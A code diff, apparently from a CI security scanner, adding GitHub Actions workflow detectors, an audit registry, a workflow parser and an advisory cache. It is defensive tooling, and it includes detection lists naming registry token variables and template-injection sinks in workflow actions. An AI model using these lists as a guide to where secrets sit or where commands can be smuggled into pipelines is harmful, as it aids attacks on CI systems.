+ +function gatherStepConditions(parsed: unknown): StepCondition[] { + const root = asRecord(parsed); + const jobs = asRecord(root?.jobs); + if (!jobs) { + return []; + } + + const candidates: StepCondition[] = []; + for (const [jobId, jobValue] of Object.entries(jobs)) { + const job = asRecord(jobValue); + const steps = Array.isArray(job?.steps) ? job.steps : []; + steps.forEach((stepValue, stepIndex) => { + const step = asRecord(stepValue); + if (!step || typeof step.if !== "string") { + return; + } + candidates.push({ + jobId, + stepIndex, + condition: step.if, + run: typeof step.run === "string" ? step.run : undefined, + }); + }); + } + return candidates; +} + +function isUnsoundContains(condition: string): boolean { + return UNTRUSTED_CONTAINS_PATTERNS.some((pattern) => pattern.test(condition)); +} + +function isPrivilegedStep(run: string | undefined): boolean { + const normalized = run?.toLowerCase() ?? ""; + return PRIVILEGED_COMMANDS.some((command) => normalized.includes(command)); +} + +export function detectWorkflowUnsoundContains(input: WorkflowUnsoundContainsInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + for (const candidate of gatherStepConditions(input.parsed)) { + if (!isUnsoundContains(candidate.condition) || !isPrivilegedStep(candidate.run)) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [candidate.condition, candidate.run ?? ""], + fallbackValue: candidate.condition, + }); + + findings.push({ + rule_id: "workflow-unsound-contains", + finding_id: `WORKFLOW_UNSOUND_CONTAINS-${input.filePath}-${candidate.jobId}-${candidate.stepIndex}`, + severity: "HIGH", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${candidate.jobId}.steps[${candidate.stepIndex}].if` }, + description: "Workflow gates a privileged step with contains() over untrusted event content", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-20", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Avoid trust decisions based on contains() over untrusted titles, bodies, or comments", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-use-trusted-publishing.ts b/src/layer2-static/detectors/workflow-use-trusted-publishing.ts new file mode 100644 index 0000000..f56ff95 --- /dev/null +++ b/src/layer2-static/detectors/workflow-use-trusted-publishing.ts @@ -0,0 +1,87 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowUseTrustedPublishingInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const PUBLISH_COMMANDS = ["npm publish", "pnpm publish", "yarn npm publish", "twine upload"]; +const TOKEN_NAMES = ["NODE_AUTH_TOKEN", "NPM_TOKEN", "TWINE_USERNAME", "TWINE_PASSWORD"]; + +function containsPublishCommand(value: string | undefined): boolean { + if (!value) { + return false; + } + return PUBLISH_COMMANDS.some((command) => value.includes(command)); +} + +function findTokenName(textContent: string): string | null { + for (const tokenName of TOKEN_NAMES) { + if (textContent.includes(tokenName)) { + return tokenName; + } + } + return null; +} + +export function detectWorkflowUseTrustedPublishing( + input: WorkflowUseTrustedPublishingInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const tokenName = findTokenName(input.textContent); + if (!tokenName) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + if (!containsPublishCommand(step.run)) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [step.run ?? "", tokenName], + fallbackValue: step.run ?? tokenName, + }); + + findings.push({ + rule_id: "workflow-use-trusted-publishing", + finding_id: `WORKFLOW_USE_TRUSTED_PUBLISHING-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].run` }, + description: + "Package publication uses long-lived registry credentials instead of trusted publishing", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-798", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Switch package publishing to trusted publishing with OIDC and remove registry secrets", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/engine.ts b/src/layer2-static/engine.ts index 7dd2b77..50f9ec5 100644 --- a/src/layer2-static/engine.ts +++ b/src/layer2-static/engine.ts @@ -7,6 +7,42 @@ import { detectIdeSettingsIssues } from "./detectors/ide-settings.js"; import { detectPluginManifestIssues } from "./detectors/plugin-manifest.js"; import { detectRuleFileIssues } from "./detectors/rule-file.js"; import { detectSymlinkEscapes, type SymlinkEscapeEntry } from "./detectors/symlink.js"; +import { detectWorkflowExcessivePermissions } from "./detectors/workflow-excessive-permissions.js"; +import { detectWorkflowDangerousTriggers } from "./detectors/workflow-dangerous-triggers.js"; +import { detectWorkflowTemplateInjection } from "./detectors/workflow-template-injection.js"; +import { detectWorkflowKnownVulnAction } from "./detectors/workflow-known-vuln-action.js"; +import { detectWorkflowUnpinnedUses } from "./detectors/workflow-unpinned-uses.js"; +import { detectWorkflowArtipacked } from "./detectors/workflow-artipacked.js"; +import { detectWorkflowCachePoisoning } from "./detectors/workflow-cache-poisoning.js"; +import { detectWorkflowGithubEnv } from "./detectors/workflow-github-env.js"; +import { detectWorkflowInsecureCommands } from "./detectors/workflow-insecure-commands.js"; +import { detectWorkflowSelfHostedRunner } from "./detectors/workflow-self-hosted-runner.js"; +import { detectWorkflowOverprovisionedSecrets } from "./detectors/workflow-overprovisioned-secrets.js"; +import { detectWorkflowSecretsOutsideEnv } from "./detectors/workflow-secrets-outside-env.js"; +import { detectWorkflowSecretsInherit } from "./detectors/workflow-secrets-inherit.js"; +import { detectWorkflowUndocumentedPermissions } from "./detectors/workflow-undocumented-permissions.js"; +import { detectWorkflowUseTrustedPublishing } from "./detectors/workflow-use-trusted-publishing.js"; +import { detectWorkflowArchivedUses } from "./detectors/workflow-archived-uses.js"; +import { detectWorkflowStaleActionRefs } from "./detectors/workflow-stale-action-refs.js"; +import { detectWorkflowForbiddenUses } from "./detectors/workflow-forbidden-uses.js"; +import { detectWorkflowRefConfusion } from "./detectors/workflow-ref-confusion.js"; +import { detectWorkflowRefVersionMismatch } from "./detectors/workflow-ref-version-mismatch.js"; +import { detectWorkflowImpostorCommit } from "./detectors/workflow-impostor-commit.js"; +import { detectWorkflowUnpinnedImages } from "./detectors/workflow-unpinned-images.js"; +import { detectWorkflowAnonymousDefinition } from "./detectors/workflow-anonymous-definition.js"; +import { detectWorkflowConcurrencyLimits } from "./detectors/workflow-concurrency-limits.js"; +import { detectWorkflowSuperfluousActions } from "./detectors/workflow-superfluous-actions.js"; +import { detectWorkflowMisfeature } from "./detectors/workflow-misfeature.js"; +import { detectWorkflowObfuscation } from "./detectors/workflow-obfuscation.js"; +import { detectWorkflowUnsoundCondition } from "./detectors/workflow-unsound-condition.js"; +import { detectWorkflowUnsoundContains } from "./detectors/workflow-unsound-contains.js"; +import { detectDependabotCooldown } from "./detectors/dependabot-cooldown.js"; +import { detectDependabotExecution } from "./detectors/dependabot-execution.js"; +import { detectWorkflowHardcodedContainerCredentials } from "./detectors/workflow-hardcoded-container-credentials.js"; +import { detectWorkflowUnredactedSecrets } from "./detectors/workflow-unredacted-secrets.js"; +import { detectWorkflowBotConditions } from "./detectors/workflow-bot-conditions.js"; +import { filterRegisteredAudits, type RegisteredAudit } from "./audits/registry.js"; +import type { AuditPersona, RuntimeMode } from "../config.js"; import { FINDING_CATEGORIES, type Finding } from "../types/finding.js"; import type { DiscoveryFormat } from "../types/discovery.js"; import { buildFindingEvidence } from "./evidence.js"; @@ -31,6 +67,10 @@ export interface StaticEngineConfig { rulePackPaths?: string[]; allowedRules?: string[]; skipRules?: string[]; + persona?: AuditPersona; + runtimeMode?: RuntimeMode; + workflowAuditsEnabled?: boolean; + rulePolicies?: Record }>; } export interface StaticEngineInput { @@ -50,6 +90,15 @@ const GENERIC_AFFECTED_TOOLS = [ "github-copilot", ]; +interface FileAuditContext { + file: StaticFileInput; + input: StaticEngineInput; +} + +interface GlobalAuditContext { + input: StaticEngineInput; +} + function parseRuleSeverity(value: string): Finding["severity"] { const normalized = value.trim().toUpperCase(); if ( @@ -78,6 +127,26 @@ function remediationActionsForRule(rule: DetectionRule): string[] { return ["remove_field", "replace_with_default"]; } +function resolveDisabledAuditIds( + policies: StaticEngineConfig["rulePolicies"] | undefined, +): string[] { + if (!policies) { + return []; + } + + return Object.entries(policies) + .filter(([, policy]) => policy?.disable === true) + .map(([ruleId]) => ruleId); +} + +function findRulePolicyConfig( + policies: StaticEngineConfig["rulePolicies"] | undefined, + ruleId: string, +): Record | undefined { + const config = policies?.[ruleId]?.config; + return config && typeof config === "object" ? config : undefined; +} + function findingFromRulePackMatch(file: StaticFileInput, rule: DetectionRule): Finding { const locationField = rule.query_type === "text_pattern" ? "content" : rule.query; const evidence = buildFindingEvidence({ @@ -154,8 +223,489 @@ function dedupeFindings(findings: Finding[]): Finding[] { return Array.from(deduped.values()); } -export function runStaticEngine(input: StaticEngineInput): Finding[] { +function buildFileAudits(): Array> { + return [ + { + id: "env-overrides", + run: ({ file, input }) => + detectEnvOverrides({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + trustedApiDomains: input.config.trustedApiDomains, + }), + }, + { + id: "consent-bypass", + run: ({ file, input }) => + detectConsentBypass({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + trustedApiDomains: input.config.trustedApiDomains, + }), + }, + { + id: "command-execution", + run: ({ file, input }) => + detectCommandExecution({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + knownSafeMcpServers: input.config.knownSafeMcpServers, + knownSafeFormatters: input.config.knownSafeFormatters, + knownSafeLspServers: input.config.knownSafeLspServers, + blockedCommands: input.config.blockedCommands, + }), + }, + { + id: "ide-settings", + run: ({ file, input }) => + input.config.checkIdeSettings + ? detectIdeSettingsIssues({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + projectRoot: input.projectRoot, + }) + : [], + }, + { + id: "plugin-manifest", + run: ({ file, input }) => + detectPluginManifestIssues({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + trustedApiDomains: input.config.trustedApiDomains, + blockedCommands: input.config.blockedCommands, + }), + }, + { + id: "advisory-intelligence", + run: ({ file }) => + detectAdvisoryIntelligence({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }), + }, + { + id: "rule-file", + run: ({ file, input }) => + file.format === "text" || file.format === "markdown" + ? detectRuleFileIssues({ + filePath: file.filePath, + textContent: file.textContent, + unicodeAnalysis: input.config.unicodeAnalysis, + }) + : [], + }, + { + id: "workflow-unpinned-uses", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowUnpinnedUses({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-dangerous-triggers", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowDangerousTriggers({ + filePath: file.filePath, + parsed: file.parsed, + }) + : [], + }, + { + id: "workflow-excessive-permissions", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowExcessivePermissions({ + filePath: file.filePath, + parsed: file.parsed, + }) + : [], + }, + { + id: "workflow-template-injection", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowTemplateInjection({ + filePath: file.filePath, + parsed: file.parsed, + }) + : [], + }, + { + id: "workflow-known-vuln-action", + onlineRequired: true, + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowKnownVulnAction({ + filePath: file.filePath, + parsed: file.parsed, + runtimeMode: input.config.runtimeMode, + }) + : [], + }, + { + id: "workflow-artipacked", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowArtipacked({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-cache-poisoning", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowCachePoisoning({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-github-env", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowGithubEnv({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-insecure-commands", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowInsecureCommands({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-self-hosted-runner", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowSelfHostedRunner({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-overprovisioned-secrets", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowOverprovisionedSecrets({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-secrets-outside-env", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowSecretsOutsideEnv({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-secrets-inherit", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowSecretsInherit({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-undocumented-permissions", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowUndocumentedPermissions({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-use-trusted-publishing", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowUseTrustedPublishing({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-archived-uses", + onlineRequired: true, + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowArchivedUses({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-stale-action-refs", + onlineRequired: true, + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowStaleActionRefs({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-forbidden-uses", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowForbiddenUses({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + config: findRulePolicyConfig(input.config.rulePolicies, "workflow-forbidden-uses"), + }) + : [], + }, + { + id: "workflow-ref-confusion", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowRefConfusion({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-ref-version-mismatch", + onlineRequired: true, + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowRefVersionMismatch({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + runtimeMode: input.config.runtimeMode, + }) + : [], + }, + { + id: "workflow-impostor-commit", + onlineRequired: true, + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowImpostorCommit({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + runtimeMode: input.config.runtimeMode, + }) + : [], + }, + { + id: "workflow-unpinned-images", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowUnpinnedImages({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-anonymous-definition", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowAnonymousDefinition({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-concurrency-limits", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowConcurrencyLimits({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-superfluous-actions", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowSuperfluousActions({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-misfeature", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowMisfeature({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-obfuscation", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowObfuscation({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-unsound-condition", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowUnsoundCondition({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "workflow-unsound-contains", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowUnsoundContains({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "dependabot-cooldown", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectDependabotCooldown({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "dependabot-execution", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectDependabotExecution({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "hardcoded-container-credentials", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowHardcodedContainerCredentials({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "unredacted-secrets", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowUnredactedSecrets({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + { + id: "bot-conditions", + run: ({ file, input }) => + input.config.workflowAuditsEnabled + ? detectWorkflowBotConditions({ + filePath: file.filePath, + parsed: file.parsed, + textContent: file.textContent, + }) + : [], + }, + ]; +} + +function buildGlobalAudits(): Array> { + return [ + { + id: "symlink-escapes", + run: ({ input }) => detectSymlinkEscapes({ symlinkEscapes: input.symlinkEscapes }), + }, + { + id: "git-hooks", + run: ({ input }) => + detectGitHookIssues({ hooks: input.hooks, knownSafeHooks: input.config.knownSafeHooks }), + }, + ]; +} + +export async function runStaticEngine(input: StaticEngineInput): Promise { const findings: Finding[] = []; + const runtimeSelection = { + persona: input.config.persona, + runtimeMode: input.config.runtimeMode, + disabledAuditIds: resolveDisabledAuditIds(input.config.rulePolicies), + }; + const activeFileAudits = filterRegisteredAudits(buildFileAudits(), runtimeSelection); + const activeGlobalAudits = filterRegisteredAudits(buildGlobalAudits(), runtimeSelection); const rulePackRules = loadRulePacks({ rule_pack_paths: input.config.rulePackPaths ?? [], allowed_rules: input.config.allowedRules ?? [], @@ -163,73 +713,8 @@ export function runStaticEngine(input: StaticEngineInput): Finding[] { }); for (const file of input.files) { - findings.push( - ...detectEnvOverrides({ - filePath: file.filePath, - parsed: file.parsed, - textContent: file.textContent, - trustedApiDomains: input.config.trustedApiDomains, - }), - ); - - findings.push( - ...detectConsentBypass({ - filePath: file.filePath, - parsed: file.parsed, - textContent: file.textContent, - trustedApiDomains: input.config.trustedApiDomains, - }), - ); - - findings.push( - ...detectCommandExecution({ - filePath: file.filePath, - parsed: file.parsed, - textContent: file.textContent, - knownSafeMcpServers: input.config.knownSafeMcpServers, - knownSafeFormatters: input.config.knownSafeFormatters, - knownSafeLspServers: input.config.knownSafeLspServers, - blockedCommands: input.config.blockedCommands, - }), - ); - - if (input.config.checkIdeSettings) { - findings.push( - ...detectIdeSettingsIssues({ - filePath: file.filePath, - parsed: file.parsed, - textContent: file.textContent, - projectRoot: input.projectRoot, - }), - ); - } - - findings.push( - ...detectPluginManifestIssues({ - filePath: file.filePath, - parsed: file.parsed, - textContent: file.textContent, - trustedApiDomains: input.config.trustedApiDomains, - blockedCommands: input.config.blockedCommands, - }), - ); - - findings.push( - ...detectAdvisoryIntelligence({ - filePath: file.filePath, - parsed: file.parsed, - textContent: file.textContent, - }), - ); - - if (file.format === "text" || file.format === "markdown") { - findings.push( - ...detectRuleFileIssues({ - filePath: file.filePath, - textContent: file.textContent, - unicodeAnalysis: input.config.unicodeAnalysis, - }), - ); + for (const audit of activeFileAudits) { + findings.push(...(await audit.run({ file, input }))); } for (const rule of rulePackRules) { @@ -251,10 +736,9 @@ export function runStaticEngine(input: StaticEngineInput): Finding[] { } } - findings.push(...detectSymlinkEscapes({ symlinkEscapes: input.symlinkEscapes })); - findings.push( - ...detectGitHookIssues({ hooks: input.hooks, knownSafeHooks: input.config.knownSafeHooks }), - ); + for (const audit of activeGlobalAudits) { + findings.push(...(await audit.run({ input }))); + } return dedupeFindings(findings); } diff --git a/src/layer2-static/github/cache.ts b/src/layer2-static/github/cache.ts new file mode 100644 index 0000000..3eefea0 --- /dev/null +++ b/src/layer2-static/github/cache.ts @@ -0,0 +1,59 @@ +import { existsSync, mkdirSync, readFileSync, writeFileSync } from "node:fs"; +import { join } from "node:path"; + +export interface AdvisoryPayload { + generatedAt: number; + advisories: Record; +} + +export const GITHUB_METADATA_CACHE_FILE = "gha-advisories.json"; + +export function resolveGithubMetadataCachePath(cacheDir: string): string { + return join(cacheDir, GITHUB_METADATA_CACHE_FILE); +} + +function isRecord(value: unknown): value is Record { + return typeof value === "object" && value !== null && !Array.isArray(value); +} + +function isAdvisoryPayload(value: unknown): value is AdvisoryPayload { + if (!isRecord(value) || typeof value.generatedAt !== "number") { + return false; + } + if (!isRecord(value.advisories)) { + return false; + } + + return Object.values(value.advisories).every( + (entry) => Array.isArray(entry) && entry.every((item) => typeof item === "string"), + ); +} + +export function loadCachedAdvisoryPayload( + cacheDir: string, + maxAgeMs: number, + now = Date.now(), +): AdvisoryPayload | null { + const path = resolveGithubMetadataCachePath(cacheDir); + if (!existsSync(path)) { + return null; + } + + try { + const parsed = JSON.parse(readFileSync(path, "utf8")) as unknown; + if (!isAdvisoryPayload(parsed)) { + return null; + } + if (now - parsed.generatedAt > maxAgeMs) { + return null; + } + return parsed; + } catch { + return null; + } +} + +export function saveCachedAdvisoryPayload(cacheDir: string, payload: AdvisoryPayload): void { + mkdirSync(cacheDir, { recursive: true }); + writeFileSync(resolveGithubMetadataCachePath(cacheDir), JSON.stringify(payload, null, 2), "utf8"); +} diff --git a/src/layer2-static/github/client.ts b/src/layer2-static/github/client.ts new file mode 100644 index 0000000..09e8ec3 --- /dev/null +++ b/src/layer2-static/github/client.ts @@ -0,0 +1,76 @@ +import { homedir } from "node:os"; +import { join } from "node:path"; +import type { RuntimeMode } from "../../config.js"; +import bundledAdvisories from "../advisories/gha-known-vulnerable-actions.json" with { type: "json" }; +import { + loadCachedAdvisoryPayload, + saveCachedAdvisoryPayload, + type AdvisoryPayload, +} from "./cache.js"; + +function normalizeAdvisoryMap(value: Record): Record { + const normalized: Record = {}; + for (const [action, versions] of Object.entries(value)) { + normalized[action.toLowerCase()] = versions.map((version) => version.toLowerCase()); + } + return normalized; +} + +export interface GithubMetadataClientOptions { + runtimeMode?: RuntimeMode; + cacheDir?: string; + cacheMaxAgeMs?: number; + now?: number; +} + +export interface GithubMetadataClient { + runtimeMode: RuntimeMode; + cacheDir: string; + cacheMaxAgeMs: number; + isOnlineEnabled(): boolean; + loadKnownVulnerableActions(bundle: Record): AdvisoryPayload; +} + +export function createGithubMetadataClient( + options: GithubMetadataClientOptions = {}, +): GithubMetadataClient { + const runtimeMode = options.runtimeMode ?? "offline"; + const cacheDir = options.cacheDir ?? join(homedir(), ".codegate", "cache"); + const cacheMaxAgeMs = options.cacheMaxAgeMs ?? 24 * 60 * 60 * 1000; + const now = options.now ?? Date.now(); + + return { + runtimeMode, + cacheDir, + cacheMaxAgeMs, + isOnlineEnabled() { + return runtimeMode === "online"; + }, + loadKnownVulnerableActions(bundle: Record): AdvisoryPayload { + const payload: AdvisoryPayload = { + generatedAt: now, + advisories: normalizeAdvisoryMap(bundle), + }; + + if (!runtimeMode || runtimeMode !== "online") { + return payload; + } + + const cached = loadCachedAdvisoryPayload(cacheDir, cacheMaxAgeMs, now); + if (cached) { + return cached; + } + + saveCachedAdvisoryPayload(cacheDir, payload); + return payload; + }, + }; +} + +export function loadBundledGithubAdvisories( + options: GithubMetadataClientOptions = {}, +): AdvisoryPayload { + return createGithubMetadataClient(options).loadKnownVulnerableActions( + bundledAdvisories as Record, + ); +} diff --git a/src/layer2-static/workflow/injection-sinks.json b/src/layer2-static/workflow/injection-sinks.json new file mode 100644 index 0000000..9aef069 --- /dev/null +++ b/src/layer2-static/workflow/injection-sinks.json @@ -0,0 +1,5 @@ +{ + "actions/github-script": ["script"], + "azure/powershell": ["inlineScript"], + "addnab/docker-run-action": ["run", "options"] +} diff --git a/src/layer2-static/workflow/parser.ts b/src/layer2-static/workflow/parser.ts new file mode 100644 index 0000000..2ceb3d1 --- /dev/null +++ b/src/layer2-static/workflow/parser.ts @@ -0,0 +1,108 @@ +import type { WorkflowFacts, WorkflowJobFacts, WorkflowStepFacts } from "./types.js"; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function asString(value: unknown): string | undefined { + return typeof value === "string" ? value : undefined; +} + +function normalizeWorkflowPath(value: string): string { + return value.replaceAll("\\", "/"); +} + +export function isGitHubWorkflowPath(path: string): boolean { + return /(?:^|\/)\.github\/workflows\/[^/]+\.ya?ml$/iu.test(normalizeWorkflowPath(path)); +} + +function extractTriggers(value: unknown): string[] { + if (typeof value === "string") { + return [value]; + } + if (Array.isArray(value)) { + return value.filter((entry): entry is string => typeof entry === "string"); + } + + const record = asRecord(value); + if (!record) { + return []; + } + + return Object.keys(record); +} + +function extractStepFacts(step: unknown): WorkflowStepFacts | null { + const stepRecord = asRecord(step); + if (!stepRecord) { + return null; + } + + const withValues = asRecord(stepRecord.with); + const withEntries: Record = {}; + if (withValues) { + for (const [key, value] of Object.entries(withValues)) { + if (typeof value === "string") { + withEntries[key] = value; + } + } + } + + const stepFacts: WorkflowStepFacts = { + uses: asString(stepRecord.uses), + run: asString(stepRecord.run), + with: Object.keys(withEntries).length > 0 ? withEntries : undefined, + }; + + if (!stepFacts.uses && !stepFacts.run) { + return null; + } + + return stepFacts; +} + +function extractJobFacts(id: string, value: unknown): WorkflowJobFacts | null { + const jobRecord = asRecord(value); + if (!jobRecord) { + return null; + } + + const stepsRaw = Array.isArray(jobRecord.steps) ? jobRecord.steps : []; + const steps = stepsRaw + .map((step) => extractStepFacts(step)) + .filter((step): step is WorkflowStepFacts => step !== null); + + return { + id, + permissions: jobRecord.permissions, + steps, + }; +} + +export function extractWorkflowFacts(parsed: unknown): WorkflowFacts | null { + const root = asRecord(parsed); + if (!root) { + return null; + } + + const triggers = extractTriggers(root.on); + const jobsRecord = asRecord(root.jobs); + const jobs: WorkflowJobFacts[] = jobsRecord + ? Object.entries(jobsRecord) + .map(([id, value]) => extractJobFacts(id, value)) + .filter((job): job is WorkflowJobFacts => job !== null) + : []; + + if (triggers.length === 0 && jobs.length === 0) { + return null; + } + + return { + triggers, + workflowPermissions: root.permissions, + jobs, + }; +} diff --git a/src/layer2-static/workflow/types.ts b/src/layer2-static/workflow/types.ts new file mode 100644 index 0000000..4570621 --- /dev/null +++ b/src/layer2-static/workflow/types.ts @@ -0,0 +1,17 @@ +export interface WorkflowStepFacts { + uses?: string; + run?: string; + with?: Record; +} + +export interface WorkflowJobFacts { + id: string; + permissions?: unknown; + steps: WorkflowStepFacts[]; +} + +export interface WorkflowFacts { + triggers: string[]; + workflowPermissions?: unknown; + jobs: WorkflowJobFacts[]; +} diff --git a/src/pipeline.ts b/src/pipeline.ts index 76c0162..d7b12e0 100644 --- a/src/pipeline.ts +++ b/src/pipeline.ts @@ -74,14 +74,16 @@ interface Layer3ToolEntry { type ToolClassificationMap = Record; -export function runStaticPipeline(input: StaticPipelineInput): CodeGateReport { - const findings = runStaticEngine({ - projectRoot: input.projectRoot, - files: input.files, - symlinkEscapes: input.symlinkEscapes, - hooks: input.hooks, - config: input.config, - }).map(withFindingFingerprint); +export async function runStaticPipeline(input: StaticPipelineInput): Promise { + const findings = ( + await runStaticEngine({ + projectRoot: input.projectRoot, + files: input.files, + symlinkEscapes: input.symlinkEscapes, + hooks: input.hooks, + config: input.config, + }) + ).map(withFindingFingerprint); const report = createEmptyReport({ version: input.version, diff --git a/src/reporter/sarif.ts b/src/reporter/sarif.ts index dee724d..1c00c42 100644 --- a/src/reporter/sarif.ts +++ b/src/reporter/sarif.ts @@ -33,6 +33,7 @@ interface SarifResult { level: "error" | "warning" | "note"; message: { text: string }; locations: SarifLocation[]; + relatedLocations?: SarifLocation[]; properties: Record; } @@ -64,25 +65,54 @@ function toSarifLevel(severity: Finding["severity"]): SarifResult["level"] { } function findingToLocation(finding: Finding): SarifLocation { + return locationToSarif({ + filePath: finding.file_path, + location: finding.location, + }); +} + +function locationToSarif(input: { + filePath: string; + location?: { + line?: number; + column?: number; + }; +}): SarifLocation { const region: SarifRegion = {}; - if (typeof finding.location.line === "number") { - region.startLine = finding.location.line; + if (typeof input.location?.line === "number") { + region.startLine = input.location.line; } - if (typeof finding.location.column === "number") { - region.startColumn = finding.location.column; + if (typeof input.location?.column === "number") { + 